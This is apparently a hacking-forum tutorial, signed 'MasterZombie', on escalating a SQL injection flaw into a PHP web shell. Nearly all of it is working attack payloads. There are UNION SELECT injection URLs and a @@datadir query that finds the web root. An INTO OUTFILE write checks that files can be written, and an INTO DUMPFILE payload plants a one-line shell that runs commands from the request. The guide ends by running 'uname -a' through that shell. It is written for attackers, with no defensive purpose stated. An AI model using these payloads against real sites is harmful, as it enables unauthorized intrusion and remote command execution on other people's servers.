SQLi to PHP Shell Upload

Salam From MasterZombie

THis is just a little tip on what you can do if your SQLi vulnerable site doesn't have valuable information in the database.

I am not going to go too deep into every single move but if you have basic knowledge in Web application hacking I think you will understand what I am doing.

First we have our SQL Injection vulnerable site:

Code:

www.target.com/index.php?id=-1 union select 1,2,3--

Now we would like to know the directory we are currently in, we have a great command for this:

Code:

www.target.com/index.php?id=-1 union select 1,2,@@datadir--

Ah, splending, it outputs: /var/www/html/

Now, what we would like to do is try to save a file on the server, like this:

Code:

www.target.com/index.php?id=-1 union select null,null,'test' INTO OUTFILE '/var/www/html/test.txt'--

To check if this worked, we would go to http://www.target.com/test.txt

If you see a empty document with only the word "test" printed on the screen, then we are good to go.


As for the actual fun, we are now going to upload a simple PHP shell on our target:

Code:

www.target.com/index.php?id=-1 union+select+null,null,'<?php%20@system($_REQUEST["cmd"]);%20?>'+INTO+DUMPFILE+'/var/www/html/shell.php'--

and now we try if the shell works by visiting and choose a command to execute:

Code:

www.target.com/shell.php?cmd=uname -a

You know the deal, if it returns something like:

"Linux target 2.6.18-blablabla #1 SMP Fri Dec 17 13:37:00 2010 i686 athlon i1337 GNU/Linux"

Then it means it worked.